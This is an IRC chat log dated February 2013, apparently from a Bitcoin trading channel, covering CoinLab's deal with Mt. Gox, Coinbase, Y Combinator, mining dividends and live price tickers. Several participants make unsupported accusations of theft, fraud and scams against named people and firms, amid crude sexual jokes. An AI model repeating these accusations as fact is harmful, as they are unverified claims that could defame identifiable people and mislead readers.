lol: https://bitcointalk.org/index.php?topic=144422.msg1568000#msg1568000 Feb 28 18:23:41 mod6 Feb 28 18:23:49 i need to talk witchoo Feb 28 18:26:49 yoh ok Feb 28 18:31:12 lol as a result of the discussions here, mtgox came out with a forum post in support of coinbase. Feb 28 18:32:53 coinlab? Feb 28 18:33:24 http://bitcoinmagazine.com/coinlab-bringing-bitcoin-to-wall-street-with-mtgox-deal/ Feb 28 18:33:44 Bugpowdrr http://trilema.com/2013/ycombinator-continues-to-suck-jointly-and-severally/#comment-92223 Feb 28 18:33:48 i find from commenters. Feb 28 18:34:00 nOgAnOo you're about a day late ? Feb 28 18:34:13 I just rejoined bitcoin today Feb 28 18:34:15 after 3 years Feb 28 18:34:16 thank you Feb 28 18:34:25 Sorry I'm 24 hours late on the news post Feb 28 18:34:29 Oh master of bitcoins. Feb 28 18:34:42 Was trying to help. Feb 28 18:34:47 I sincerely apologize. Feb 28 18:34:49 lol mircea_popescu the btc Fed chair Feb 28 18:35:02 nOgAnOo now now, don't get excited. how was your vacation ? Feb 28 18:35:06 mircea benaneke i will call him Feb 28 18:35:11 Sad, I have .43 Feb 28 18:35:14 aw! Feb 28 18:35:20 thestringpuller i dun has a heli. Feb 28 18:35:30 I just updated my client from .3.20 Feb 28 18:35:31 "Liquidity requires symmetric information, which is easiest to achieve when everyone is ignorant. This determines the design of many securities, including the design of debt and securitization" Feb 28 18:35:32 lmao Feb 28 18:37:02 Wow it seems you posted a link a few seconds after mine quoting my link! Feb 28 18:37:07 It seems I was relevant after all? Feb 28 18:37:10 :) Feb 28 18:37:23 so they are watching Feb 28 18:37:24 “coinlab-bringing-bitcoin-to-wall-street-with-mtgox-deal” Feb 28 18:37:28 heh Feb 28 18:37:37 mtgox still doesnt explain what it even means Feb 28 18:37:40 2 thumbs down Feb 28 18:38:01 vague press is vague Feb 28 18:38:10 pigeons yes but then again they never don't and usually don't even know what anything means. Feb 28 18:38:15 Easier for corporations to buy mass amounts of bitcoins Feb 28 18:38:15 ooo, now you get another middleman! Feb 28 18:38:20 Cheaper transactions Feb 28 18:38:28 because if they did, everyone would know that gox basically raped CoinLab investors for a chance to make bitcoin available to dummies Feb 28 18:38:32 and in a horrible country for financial transactions! Feb 28 18:38:55 nOgAnOo: that makes no sense Feb 28 18:39:05 if coinlab doesn't pull a rabbit out of their hat, i predict they are over Feb 28 18:39:05 well, i appreciate at tleast the part where they read up on what they fucked up and try to fix it Feb 28 18:39:12 that is a solid prediction Feb 28 18:39:16 course, fixing it in their usual dodderingway, but at least the attempt is there. Feb 28 18:39:44 which all boils down to jcpham being basically right : Feb 28 18:39:51 all they need now is the rabbit out of a hat and they'll survive. Feb 28 18:40:06 i think theyll do it Feb 28 18:40:18 in other news, asicminer thread over 100 pages. Feb 28 18:40:20 it only takes a few million in attention Feb 28 18:40:23 that's 2000 posts+ Feb 28 18:41:11 i wonder if it ever will be the case that total blocks mined by asicminer > total posts made in asicminer thread. Feb 28 18:41:12 1000 posts confirming satoshis hehe Feb 28 18:42:09 mtgox has quite low margins anyway and coinlab has a reputation at not understanding how to make money Feb 28 18:43:34 pigeons the sad news in all of this is mtgox basically saying "the us market is not worth serving" Feb 28 18:43:46 if anything;'s a ghetto i dunno what else it would be. Feb 28 18:44:19 i dunno dont you think gox is probably shedding 80% of the work for .2% of the profit? Feb 28 18:44:27 well its been true. exchb was a good example. Feb 28 18:44:28 (meanwhile @the red house, bob woodward is "being punished") Feb 28 18:46:01 some telling info on the faqs at http://coinlab.com/transition Feb 28 18:46:08 https://bitcointalk.org/index.php?topic=35775.msg1565186#msg1565186 Feb 28 18:46:09 severely not severally Feb 28 18:46:14 this is pretty heavy, first actual usecase for ripple Feb 28 18:46:17 "Mt. Gox really wants to be 100% out of the US/Canada market." Feb 28 18:46:23 transferring peter lambert assets. Feb 28 18:46:37 https://twitter.com/coinlab Feb 28 18:46:38 Bugpowder you mean in the article ? Feb 28 18:46:46 coinlab is pissing me off for changing their business model and delaying things Feb 28 18:46:50 the title Feb 28 18:46:51 http://www.theblaze.com/stories/2013/02/28/you-will-regret-the-full-threat-email-a-top-white-house-official-sent-bob-woodward/ Feb 28 18:46:58 Bugpowder joint and several, jointly and severally. Feb 28 18:47:09 multiple Feb 28 18:47:11 ok Feb 28 18:47:13 kewl Feb 28 18:47:18 i hope coinlab succeeds though Feb 28 18:47:22 yeah Feb 28 18:47:27 coinlab better succeed Feb 28 18:47:34 or crash city Feb 28 18:47:51 if they do succeed though, gonna be nice pump Feb 28 18:48:00 Bugpowder it will crash sometime in late summer/early autumn, probably taking some people's btc with them. Feb 28 18:48:04 they won't succeed and i dont see it affecting price either way Feb 28 18:48:06 the effect on the exchange rate will be nil. Feb 28 18:48:14 drat pigeons beat me to it. Feb 28 18:48:31 I really dislike the 'folksy' style of their communication. Feb 28 18:48:51 trying to watch these idiots on CNBC/CNN/Faux others + washington try to keep the shit inside the horse is quite comica. Feb 28 18:48:52 Bro, be chill we are like totally secure dude Feb 28 18:48:57 *comical. Feb 28 18:49:08 https://bitcointalk.org/index.php?topic=147603.msg1567583#msg1567583 sgornick has a total blank moment. Feb 28 18:49:18 mod6 i get reports :) Feb 28 18:49:35 coinlab used to say they had "lots" of hpc clients lined up for gpu mininers work, anytime i tried to get details the answer was "lots of people pay for password cracking" and that work obviously never showed up so i question their honesty as well Feb 28 18:50:12 i'd say the real question isn't whether coinlab can deliver but whether wall street will bite Feb 28 18:50:51 http://coinlab.com/liquidity Feb 28 18:50:57 wtf is this website Feb 28 18:51:05 yeah they are offering tools no one wants or needs Feb 28 18:51:11 they removed the Buy $1m bitcoins buttons Feb 28 18:51:13 coinlab.com used to point to some funky WURM online game Feb 28 18:51:22 Give us a call at 855-Lab-Coin or drop us a line to ask us about: Feb 28 18:51:22 Foreign Exchange Liquidity Provision Feb 28 18:51:23 Large Transactions Feb 28 18:51:23 Custom Orders / Standing Orders Feb 28 18:51:23 Full-Service Support for Family and Institutional Wealth Feb 28 18:51:30 goddamnit you motherfuckers coinlab Feb 28 18:52:41 pigeons there's more good reason to question their honesty Feb 28 18:53:01 loads of little things cropping up, like the habit of cancelling trades when price goes up then paying off those who throw a stink on forum Feb 28 18:53:09 mircea_popescu: that's coinbase Feb 28 18:53:17 there's a difference ? Feb 28 18:53:26 Mt. Gox really wants to be 100% out of the US/Canada market. Feb 28 18:53:33 yes coinbase is the ycombinator/pgraham one Feb 28 18:53:53 coinbase is a gox front end with extra fees and extra problems Feb 28 18:53:57 this is a sad twitter account Feb 28 18:54:06 210 followers Feb 28 18:54:36 coinlab is a former mining pool that overpaid so they could keep users for when they got non bitcoin hashing work that never showed up Feb 28 18:54:37 theyu follow SatoshiDice Feb 28 18:54:57 asicmining divs are out Feb 28 18:56:10 coinbase was giving out .1 btc for account refferals when they started and was gonna implement a big pyramid scheme but the rising price killed that Feb 28 18:56:10 did asicminer just push out the real dividend? Feb 28 18:56:17 yep :D Feb 28 18:56:29 pigeons you said coinbase twice. Feb 28 18:56:31 i am confused. Feb 28 18:56:39 isn't coinlab run by the same people who run coinbase ? Feb 28 18:57:13 no Feb 28 18:57:48 today i have been using coinbase to refer to coinbase and coinlab to refer oinlab Feb 28 18:58:06 yesterday i was not so accurate Feb 28 18:58:24 Diablo-D3 so have they scrapped their exchange or wtf are they doing ? Feb 28 18:58:45 who's coinlab then ? Feb 28 18:58:53 http://coinlab.com/about Feb 28 18:58:59 https://coinbase.com/about Feb 28 18:59:24 mircea_popescu: theres plans in the works Im not allowed to talk about Feb 28 19:00:01 http://pool.coinlab.com/partners/goats Feb 28 19:00:07 [MPEX] [S.MPOE] 4537 @ 0.00075999 = 3.4481 BTC [+] Feb 28 19:01:20 [MPEX] [S.MPOE] 500 @ 0.00075999 = 0.38 BTC [+] Feb 28 19:01:50 pigeons youy're kidding, right ? Feb 28 19:01:50 http://techcrunch.com/2011/07/12/y-combinator-alum-memsql-raises-2-1-million-from-ashton-kutcher-sv-angel-and-more/ Feb 28 19:02:16 i'm kidding about what? Feb 28 19:02:25 mircea_popescu: I hate TC, honestly Feb 28 19:02:29 they report news like shit Feb 28 19:02:47 pigeons vessenes is ycombinator. Feb 28 19:02:53 the two ventures are in no way distinct. Feb 28 19:03:06 y combinator is a group of VCs, btw Feb 28 19:03:19 theres a few y combinator VCs that represent VC companies Feb 28 19:03:31 no. Feb 28 19:03:36 ycombinator is a team of dorks. Feb 28 19:03:44 the vcs that get sucked in are usually innocent Feb 28 19:03:50 well, dorks backed by vc Feb 28 19:03:54 everyone's right Feb 28 19:04:02 yeah, everytime they can be fooled into it. Feb 28 19:04:08 mircea_popescu: ycombinator isnt a team of dorks Feb 28 19:04:18 I think they invest rather too readily, though Feb 28 19:04:25 me too Feb 28 19:04:32 actually, maybe thats not it Feb 28 19:04:37 they invest too much too readily Feb 28 19:04:37 vc techno-fanbois Feb 28 19:04:49 jcpham nothing wrong with throwingmoney around in principle Feb 28 19:04:49 its okay to invest small amounts in iffy ventures if you're hedging bets Feb 28 19:04:55 perhaps narrowly is the word Feb 28 19:05:00 if you're sitting on a few bn, it makes sense to peel the odd million to aggitated kids. Feb 28 19:05:02 they want to invest in the next google Feb 28 19:05:05 instead, they get the next yahoo Feb 28 19:05:06 you never know when you need a cock sucked. Feb 28 19:05:38 well, honestly, the vc game is like that by nature. you can't predict the future. you have to place a bunch of bets and hope one hits it big Feb 28 19:05:49 exactly. Feb 28 19:05:53 like the hollywood box office model Feb 28 19:05:56 which is why i say, teh vcs are mostly innocent Feb 28 19:05:59 splnkr: actually, I _can_ predict the future Feb 28 19:06:04 thanks i thought they were distinct. the combination lowers my esteem for both of them Feb 28 19:06:06 but the sort of shit ycombinator pushes is horrible. Feb 28 19:06:18 Diablo-D3: don't be wasting your time here then! Feb 28 19:06:21 like coinbase? Feb 28 19:06:27 splnkr: that isnt it Feb 28 19:06:28 blu3gr1f1on like airbnb Feb 28 19:06:32 which is what soured me on them entirely. Feb 28 19:06:45 coupla years ago i was living with a generally good opinion of them and graham Feb 28 19:06:54 what do you mean then Feb 28 19:06:55 if I understand the business plan, if I meet the founders and drill the shit out of them and they pass, and if the market they're going into is a logical choice Feb 28 19:06:58 then its a sure winner Feb 28 19:07:02 the problem is Feb 28 19:07:07 _thats incredibly rare_ Feb 28 19:08:15 but if your business model is venture capital investment, don't you have to play your cards even in the absence of those rare cases? Feb 28 19:08:42 splnkr: nope. Feb 28 19:08:42 then it's throwing darts with the best available along those parameters Feb 28 19:08:47 thats where they get their game wrong Feb 28 19:08:51 like, okay, lets take apple Feb 28 19:08:52 splnkr that's a fine way to bleed equity. Feb 28 19:08:57 its not the example I want but it works Feb 28 19:09:01 apple does three things Feb 28 19:09:08 they build products, they sell a service, and they also invest Feb 28 19:09:11 in general banking goes bust when the sort of managers that think "we have to play" rise to the top. Feb 28 19:09:12 well this is what i see happening mircea_popescu Feb 28 19:09:14 apple has a huge fucking investment department Feb 28 19:09:15 that sort of managers are shit. Feb 28 19:09:27 they are now being sued because they are, according to shareholders, "hoarding cash" Feb 28 19:09:33 I hope apple wins, btw Feb 28 19:09:43 apple is waiting for that one perfect deal and they want to buy it Feb 28 19:09:48 Diablo-D3 a company that large is always goingto have activist shareholders going at it. Feb 28 19:09:53 usually multiple groups. Feb 28 19:10:00 mircea_popescu: yeah, but this is big enough to make the financial news Feb 28 19:10:07 yeah i say good for apple for having so much cash Feb 28 19:10:09 a lot of major corporate investors are running this one Feb 28 19:10:11 zipbit is the patrickharnett/jonathan ryan owens scam right? Feb 28 19:10:13 it doesn't often get reported (this wouldn't have except the "cash hoarding" bs meets the community aggenda of the current whiote house) Feb 28 19:10:19 http://coinlab.com/strategy Feb 28 19:10:20 and not debt leveraging themselves into oblivion Feb 28 19:10:28 apple, as a business, is ran well Feb 28 19:10:34 I dont agree with them on a lot of _technical_ issues Feb 28 19:10:48 but steve jobs left behind a very competent executive staff Feb 28 19:11:19 wait zipbit is the patrick harnett/jonathan ryan owens/kimdotcom scam Feb 28 19:11:33 they are one of coinlab's 3 customers Feb 28 19:12:02 so I dunno Feb 28 19:12:22 I agree with mircea_popescu's wording of that though Feb 28 19:12:25 its stupid to bleed capital Feb 28 19:12:39 pigeons they mean bitcoini caca consultancy don't they Feb 28 19:12:45 wow looking at all these partners and startups, i guess all i need is twitter bootstrap and im a startup Feb 28 19:12:56 pigeons: basically Feb 28 19:12:59 and that pisses me off Feb 28 19:13:06 I mean, I like people starting up companies Feb 28 19:13:08 pigeons yes, the zipbit scam is their userbase. Feb 28 19:13:19 that pushes the economy uphill pretty hard Feb 28 19:13:22 its a good thing Feb 28 19:13:26 anyway, the girl is starting a bitchslap programme on bitcointalk, Feb 28 19:13:27 but I dont like the fucktards running around Feb 28 19:13:32 this should prop the price up to 40 at least. Feb 28 19:13:36 if you're going to do it, THEN OD IT Feb 28 19:13:53 I am a firm believer in the GSD methodology. Feb 28 19:14:14 oooooh, bootstrap baby, you'll beget a billion beautiful sites that do nothing, oooooh Feb 28 19:14:21 splnkr: and bootstrap sucks Feb 28 19:14:22 Ive used it Feb 28 19:14:33 its one of the worst css-in-a-box kits ever Feb 28 19:14:39 foundation is pretty shitty too Feb 28 19:14:56 splnkr at least it's no ruby on rails. Feb 28 19:15:00 what's any better though? Feb 28 19:15:00 lol Feb 28 19:15:06 mircea_popescu: actually, it can be Feb 28 19:15:09 then you know you're fucked Feb 28 19:15:28 you often use foundation and bootstrap in the front with RoR or some pythonated hell in the back Feb 28 19:15:29 course it can be, bitcoinica was, if you recall, a bootstrap site coded in ror and hosted on linode. Feb 28 19:15:40 bootsrap only handles the css Feb 28 19:15:43 first time i heard about ruby on rails i thought it was a chick who was a coke fiend Feb 28 19:15:47 j/k Feb 28 19:15:55 btw, why the fuck do people keep using jquery Feb 28 19:15:55 ok this is the best Feb 28 19:15:59 http://coinlab.com/storage Feb 28 19:16:03 a chick that was a cocke fiend wouldn't have as many holes Feb 28 19:16:06 I fucking hate jquery Feb 28 19:16:06 you just found that? Feb 28 19:16:07 and they wouldn't be as loose Feb 28 19:16:10 it is a arge bloated pile of shit Feb 28 19:16:13 pigeons, you're getting slow in your old age Feb 28 19:16:18 imsaguy he's been on a journey of discovery Feb 28 19:16:19 they have a quote calculator for storing your bitcoins for you Feb 28 19:16:27 I'm loving the ticker quote in the Feb 28 19:16:32 I can store my bitcoins for me myself. Feb 28 19:16:33 except its a 3 hours old quote Feb 28 19:16:42 I dont need to pay someone to do it for me Feb 28 19:16:49 Diablo-D3: don't tell grandma that. Feb 28 19:16:57 then again, grandma isn't going to buy bitcoin Feb 28 19:16:57 Diablo-D3 http://polimedia.us/dtng/c/src/136192804573.jpg Feb 28 19:17:07 I fucking pgp encrypt it with a passphrase, and then upload it to multiple VPSes Feb 28 19:17:12 tada, my own fucking cloud. Feb 28 19:17:18 I just put my wallet.dat on linode Feb 28 19:17:23 i tattoo it on starving children. Feb 28 19:17:26 mirrored to lots of places Feb 28 19:17:26 and THATs why wall street won't bite. Feb 28 19:17:27 lol Feb 28 19:17:31 i like the "how technically minded are you " question to prequalify who is dumb enough to pay them to store bitcoins Feb 28 19:17:38 mircea_popescu: dont care for blondes Feb 28 19:17:43 pigeons lol. Feb 28 19:18:03 Diablo-D3 just, the position bitcoin venture capitalists imagine the gramma in missouri to be in. Feb 28 19:18:29 exactly. Feb 28 19:18:34 mircea_popescu: yeah, I dont care about non-technical markets Feb 28 19:18:36 i don't think wall street is quite that dumb Feb 28 19:18:37 they make no sense to me Feb 28 19:18:57 and you know what one of warren buffet's rules are? Feb 28 19:19:03 splnkr wall street is neither that dumb nor that innocent. Feb 28 19:19:11 if you dont understand the business model, dont invest in it Feb 28 19:19:13 these muppets are bringing bitcoin to ws about a year too late. Feb 28 19:19:16 and I dont understand the business model. Feb 28 19:19:27 I have been stuck in the land of technology far too long to think stupid enough anymore Feb 28 19:19:55 i tell my friends that too just from a personal investment standpoint! invest in what you know Feb 28 19:19:59 it just makes more sense Feb 28 19:20:05 Coinlab charts: Current Price 163m ago $33.70 Feb 28 19:20:18 lol win. Feb 28 19:20:39 current enough for wall street Feb 28 19:20:42 ;;ticker Feb 28 19:20:43 BTCUSD ticker | Best bid: 33.61711, Best ask: 33.63998, Bid-ask spread: 0.02287, Last trade: 33.61711, 24 hour volume: 94251.07565531, 24 hour low: 30.90120, 24 hour high: 33.89000, 24 hour vwap: 32.44369 Feb 28 19:20:52 ;;coinlag Feb 28 19:20:52 Error: "coinlag" is not a valid command. Feb 28 19:21:09 Good thing people got those loyalty points Feb 28 19:21:15 worth fractions of a dollar Feb 28 19:24:21 hey, one day when a dollar is worth 1mn bitcoins you'll be happy you saved those. Feb 28 19:24:25 o no wait. Feb 28 19:24:35 it doesn't work that way. Feb 28 19:25:03 [MPEX] [S.MPOE] 7687 @ 0.00074911 = 5.7584 BTC [-] Feb 28 19:25:25 fuck that took a good 40 minutes to catch up the thread here Feb 28 19:25:26 lol Feb 28 19:25:37 Must be a slow reader. Feb 28 19:26:12 maybe you're one of the select elite that actually understands what they read. Feb 28 19:26:19 pff Feb 28 19:26:33 no but I am honest enough to admit I dont Feb 28 19:26:44 or smart enough to read more to find out Feb 28 19:27:13 There are some pretty slimey people in Bitcoin... I like that Feb 28 19:27:47 you like slimey people?? Feb 28 19:27:50 lampreys. Feb 28 19:27:55 make delicious rice Feb 28 19:28:09 ya Feb 28 19:28:29 eels lampreys jawless fish Feb 28 19:28:35 http://coinlab.com/investors Feb 28 19:28:47 good ole Tihan Seale Feb 28 19:29:02 pigeons all the good people huh. Feb 28 19:30:02 yeah man Feb 28 19:30:41 (im pretty certain bitcoinca consultancy ppl are involved) Feb 28 19:30:57 (no actual proof, but enough for an otr) Feb 28 19:31:09 i dont know these ppl Feb 28 19:31:14 who is tihan Feb 28 19:31:16 thye have the perfect credentials for this job Feb 28 19:31:22 kakobrekla tihan seale is the guy who stole from bitcoinica Feb 28 19:31:35 the azn millionaire card fraudster / antique collector Feb 28 19:31:38 the sourcE? Feb 28 19:31:42 tihan bought bitcoinica from zhou and brought in phantomcircuit and the rest is history Feb 28 19:31:45 he's the guy zhou supposedly convinced to give the moneyz back Feb 28 19:31:50 "because international" Feb 28 19:32:29 oh Feb 28 19:32:38 smells dirty. Feb 28 19:32:56 coinlab will have all us/canada mtgox users moved over by march 22. is that bfl time? Feb 28 19:33:22 they're beta testing on march 15 Feb 28 19:33:26 and alpha is even sooner Feb 28 19:33:28 vroom Feb 28 19:35:01 lol bfl time Feb 28 19:35:02 i predict smooth as danieldaniels face Feb 28 19:35:15 kako, pm'd Feb 28 19:36:43 thx Feb 28 19:36:48 np Feb 28 19:37:12 now you can talk dirty. Feb 28 19:37:16 hehe Feb 28 19:38:58 ;;estimate Feb 28 19:38:59 Next difficulty estimate | 4398067.36359 based on data since last change | 4676975.06762 based on data for last three days Feb 28 19:39:44 ;;tricker Feb 28 19:39:45 Error: "tricker" is not a valid command. Feb 28 19:42:02 [HAVELOCK] [SDICE] 3 @ 0.6895 = 2.0685 BTC [+] Feb 28 19:53:13 ;;ticker Feb 28 19:53:14 BTCUSD ticker | Best bid: 33.63000, Best ask: 33.63646, Bid-ask spread: 0.00646, Last trade: 33.63646, 24 hour volume: 97723.77922444, 24 hour low: 30.90120, 24 hour high: 33.89000, 24 hour vwap: 32.48150 Feb 28 19:57:37 ;;ticker Feb 28 19:57:37 BTCUSD ticker | Best bid: 33.63000, Best ask: 33.64000, Bid-ask spread: 0.01000, Last trade: 33.64000, 24 hour volume: 97810.83398230, 24 hour low: 30.90120, 24 hour high: 33.89000, 24 hour vwap: 32.48455 Feb 28 20:00:45 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [+] Feb 28 20:09:07 [BTCTC] [COGNITIVE] 28 @ 0.3 = 8.4 BTC [+] Feb 28 20:14:19 kakobrekla, don't you happen to know anything about https://bitcointalk.org/index.php?topic=147599.0;topicseen ? Feb 28 20:14:26 or it's just smear? Feb 28 20:15:27 i think its bogus Feb 28 20:15:39 but hey Feb 28 20:15:53 we have seen banks deny txes to btc exchanges before Feb 28 20:16:02 even with gox iirc Feb 28 20:16:18 yeah Feb 28 20:16:21 all the time Feb 28 20:16:34 I couldn't wire from BofA to gox for a while Feb 28 20:16:52 'recieving account suspended' Feb 28 20:19:23 it is a little concerning that mtgox keep bleeding market share. Feb 28 20:19:25 hm Feb 28 20:19:35 they still have that fee bug at bitstamp Feb 28 20:20:02 i guess its becoming even less obvious with btc price going up Feb 28 20:20:05 cocksuckers. Feb 28 20:26:18 by the way as a psa : i hope everyone is aware of http://www.nilsschneider.net/2013/01/28/recovering-bitcoin-private-keys.html Feb 28 20:30:32 1 BTC = 33.58999 U.S. dollars = 25.5826276 Euros Feb 28 20:40:54 0.00013045 per share for sdice divs it looks like Feb 28 20:41:35 maybe someone wins the <1 again on .01 btc this time Feb 28 20:41:40 there's still what, 12 hours Feb 28 20:42:08 not sure what time they use Feb 28 20:42:28 well unless they're in macau it's not yet march Feb 28 20:42:41 dooglus implies that estimate as "rough and ready" Feb 28 20:43:06 i think he's right. Feb 28 20:45:31 also no, http://blockchain.info/tx-index/57331947/df4d038d7734abe9385ae2d8973d8a6d42e3214489d54e6d53e30e3e0ff31076 is not me being stolen from. even if it was relied via moscow. Feb 28 20:45:33 ;;ticker Feb 28 20:45:34 BTCUSD ticker | Best bid: 33.85000, Best ask: 33.90000, Bid-ask spread: 0.05000, Last trade: 33.90000, 24 hour volume: 98135.00942093, 24 hour low: 30.90120, 24 hour high: 33.90000, 24 hour vwap: 32.52226 Feb 28 20:45:59 I was wondering when you were going to put that wad into cold storage. Feb 28 20:46:07 yeah. Feb 28 20:46:23 it was in cold storage to begin with. Feb 28 20:46:31 just changed freezers Feb 28 20:46:46 Got my asicminer div. 0.0023544 BTC per share. Feb 28 20:46:53 ah. half a milli. Feb 28 20:47:22 so like 2%. is this for the current month as feb or as march ? Feb 28 20:47:33 20% Feb 28 20:47:41 oh o Feb 28 20:47:42 no Feb 28 20:47:43 Bugpowder no, they ipod .1 Feb 28 20:47:45 2 % Feb 28 20:47:49 and are trading like .5 atm Feb 28 20:47:57 insanity Feb 28 20:48:09 although, they are the only game in town Feb 28 20:48:55 Looks like 23% to me, of the IPO price. Feb 28 20:49:08 Sadly I paid somewhat above IPO, but I still expect good things. Feb 28 20:49:36 I think it's for Feb's earnings. Or rather, all up to this point. Feb 28 20:49:52 minus the expenses Feb 28 20:49:54 B0g4r7 let's try gribble. Feb 28 20:50:02 ;;calc 0.0023544 / 0.1 * 100 Feb 28 20:50:03 2.3544 Feb 28 20:50:07 Ok. I typo'd it. Feb 28 20:50:11 Take off a leading zero. Feb 28 20:50:22 you mean a trailing zero :D Feb 28 20:54:05 what % of divs get paid per share after the initial payoff? Feb 28 20:54:36 I think divs get cut in half after the IPO price is raid in divs. Feb 28 20:54:47 Maybe less if some debts need to be paid. Feb 28 20:54:54 s/raid/repaid/ Feb 28 20:57:39 $34.00 Feb 28 20:58:45 ;;ticker Feb 28 20:58:46 BTCUSD ticker | Best bid: 33.91100, Best ask: 34.00000, Bid-ask spread: 0.08900, Last trade: 34.00000, 24 hour volume: 99306.03255539, 24 hour low: 30.90120, 24 hour high: 34.00000, 24 hour vwap: 32.54358 Feb 28 20:58:49 yay Feb 28 20:59:55 [MPEX] [O.BTCUSD.C310T] 750 @ 0.27963952 = 209.7296 BTC [+] Feb 28 21:01:37 [MPEX] [O.BTCUSD.C330T] 900 @ 0.24959007 = 224.6311 BTC [+] Feb 28 21:02:40 aaand the oix takes a full dollar jump Feb 28 21:03:35 [MPEX] [S.DICE] 28000 @ 0.00636 = 178.08 BTC [+] Feb 28 21:09:11 http://www.aeonmagazine.com/being-human/tom-chatfield-technology-intimacy/ Feb 28 21:09:39 jurov http://www.reddit.com/r/Bitcoin/comments/19dqcd/mpoe_introduced_bitcoin_price_sentiment_indicator/ methings you're banned Feb 28 21:10:19 "Whatever happens, the very meat of our physical being is to be left behind." Feb 28 21:10:28 this has been the socialist utopia for about 500 years now. Feb 28 21:10:35 i did not notice anything untoward on reddit...looks just like it never got much above threshold Feb 28 21:11:00 11 up votes 9 down votes Feb 28 21:11:35 but that one has 1 vote i thought that's how they do banning there Feb 28 21:11:50 o i am on a stale page ? Feb 28 21:12:17 this post was submitted on 28 Feb 2013 Feb 28 21:12:17 1 point (100% like it) Feb 28 21:12:17 1 up vote 0 down votes Feb 28 21:12:19 it says Feb 28 21:12:41 you're in parallel universe maybe Feb 28 21:12:53 maybe so! Feb 28 21:13:06 maybe some broken caching Feb 28 21:16:53 so, most trivial transaction possible to send 0.5BTC requires 0.0005 fee? i'm totally patching this Feb 28 21:17:00 https://blockchain.info/tx/8903532f06070433f8d95125dcd1909298b004ffb95d35ef3e371d19c95c6110 Feb 28 21:17:52 hum Feb 28 21:17:59 odd, it's under the tx limit no ? Feb 28 21:18:48 dunno what limit it's under Feb 28 21:19:04 i notice the windows client will sometimes say you need a larger fee than makes sense Feb 28 21:19:39 oh you can calculate the size in kb of your inputs and the age in your head? Feb 28 21:19:40 then i'd cancel and try again Feb 28 21:19:43 and it'd work Feb 28 21:20:15 pigeons yes Feb 28 21:20:27 but that input is smallest possible Feb 28 21:20:45 for the record i don't recall when i last paid a tx fee. Feb 28 21:20:48 possibly last summer. Feb 28 21:21:12 WELL YOUR NOT TRYING TO SCREW WITH PEOPLE ENOUGH THEN Feb 28 21:21:23 oops sorry capslock Feb 28 21:21:44 why do they even have that key Feb 28 21:22:08 what key ?! Feb 28 21:22:42 caps lock Feb 28 21:23:22 for when you type mpex commands. Feb 28 21:23:28 exchange it wot ctrl... or pry it off altogether Feb 28 21:23:57 it's a Search button on Chromebooks Feb 28 21:26:06 so let the debate rage : when i add mining indexes to mpex, should they be called MIX or DIX ? Feb 28 21:27:30 BFL Feb 28 21:27:49 indices? Feb 28 21:28:56 ungulates! Feb 28 21:29:00 what does DIX stand for? Feb 28 21:29:20 diff Feb 28 21:29:53 ;;bc,stats Feb 28 21:29:56 Current Blocks: 223637 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 138 blocks | Next Difficulty In About: 19 hours, 2 minutes, and 4 seconds | Next Difficulty Estimate: 4419440.20387 | Estimated Percent Change: 21.047 Feb 28 21:29:57 also! shameless plug : http://trilema.com/2013/permanently-elevated-plateau/ Feb 28 21:30:24 spam detected. Feb 28 21:30:33 34.25 detected Feb 28 21:31:16 pigeons http://polimedia.us/dtng/c/src/134259334770.jpg Feb 28 21:31:22 detect a little overthere why dontcha :D Feb 28 21:39:32 [BTCTC] [S.BBET-PT] 50 @ 0.0022 = 0.11 BTC [+] Feb 28 21:41:23 jurov re fees : (Fee: $ 0.00 - Size: 1878 bytes) 2013-02-28 18:17:40. (Fee: $ 0.00 - Size: 2808 bytes) 2013-02-28 18:13:12. Feb 28 21:41:24 etc Feb 28 21:51:06 mircea, your wallet is well oiled so it hasn't problem to choose optimal unspent outputs Feb 28 21:51:39 i drain the coinbr one frequently, exposing such behavoir Feb 28 21:52:29 hm Feb 28 21:52:48 i think "cold storage optimisation specialist" will become one of the better earning specialisations in the future. Feb 28 21:54:22 Mircea I love you Feb 28 21:55:29 nOgAnOo, are you a girl? Feb 28 21:56:17 cause if you;re not jurov would like to propose you love him instead. Feb 28 21:58:28 good point ill add that to my linked in ;) Feb 28 21:58:40 people will be like wtf frozen meat? Feb 28 21:59:11 lol Feb 28 21:59:14 hehe Feb 28 21:59:59 haha Feb 28 22:00:01 nice Feb 28 22:00:22 https://www.youtube.com/watch?v=oWu9TFJjHaM Feb 28 22:00:23 jesus christ Feb 28 22:00:41 o hey, shake your booty as a command. Feb 28 22:01:29 literally magic. Feb 28 22:01:36 yes, this qualifies as magic Feb 28 22:02:12 ;;ticker Feb 28 22:02:13 BTCUSD ticker | Best bid: 34.17109, Best ask: 34.40710, Bid-ask spread: 0.23601, Last trade: 34.40736, 24 hour volume: 102949.56666322, 24 hour low: 30.90120, 24 hour high: 34.51541, 24 hour vwap: 32.67158 Feb 28 22:02:17 is this mature ? Feb 28 22:02:21 i'd totally get a set for the girls. Feb 28 22:03:31 its brand new Feb 28 22:03:38 but the military HAS been experiementing with that shit for years Feb 28 22:03:43 like, you know apple's siri? Feb 28 22:03:47 yeah Feb 28 22:03:52 its the end result of a 20 year military project Feb 28 22:09:43 my god. so the discussion on #bitcoin-dev turned to proposals to round the outputs or add bitdust to them... just to spite mpex, perhaps Feb 28 22:10:01 uhhh Feb 28 22:10:03 ;;ticker Feb 28 22:10:04 BTCUSD ticker | Best bid: 32.93294, Best ask: 33.00000, Bid-ask spread: 0.06706, Last trade: 33.00000, 24 hour volume: 120954.92202604, 24 hour low: 30.90120, 24 hour high: 34.51541, 24 hour vwap: 32.58998 Feb 28 22:10:21 jurov obviously no actual devs present. Feb 28 22:10:50 $30.90 daym.. 15kBTC sale Feb 28 22:11:34 gap http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 28 22:12:42 http://www.google.com/search?q=Ycombinator&complete=0&tbs=qdr:d Feb 28 22:12:51 that's nice. twitter and trilema in that order. Feb 28 22:13:20 thats funny Feb 28 22:13:25 Bugpowder 15% gap Feb 28 22:13:29 we are living interesting times Feb 28 22:13:43 biggest gap I ever saw on gox Feb 28 22:14:00 probly from delayed tickers on Coinlab and goxlive and such Feb 28 22:14:15 sell for $31, you got it! Feb 28 22:14:33 looked like a 15k market sell Feb 28 22:14:51 maybe someone hit the sell $500k button on coinlab Feb 28 22:14:55 by accident Feb 28 22:14:57 hehe Feb 28 22:15:00 lol Feb 28 22:15:06 Right Feb 28 22:15:07 haha, "what's this do..." Feb 28 22:15:09 no , that can only happen on places where people actually have a lot of wealth Feb 28 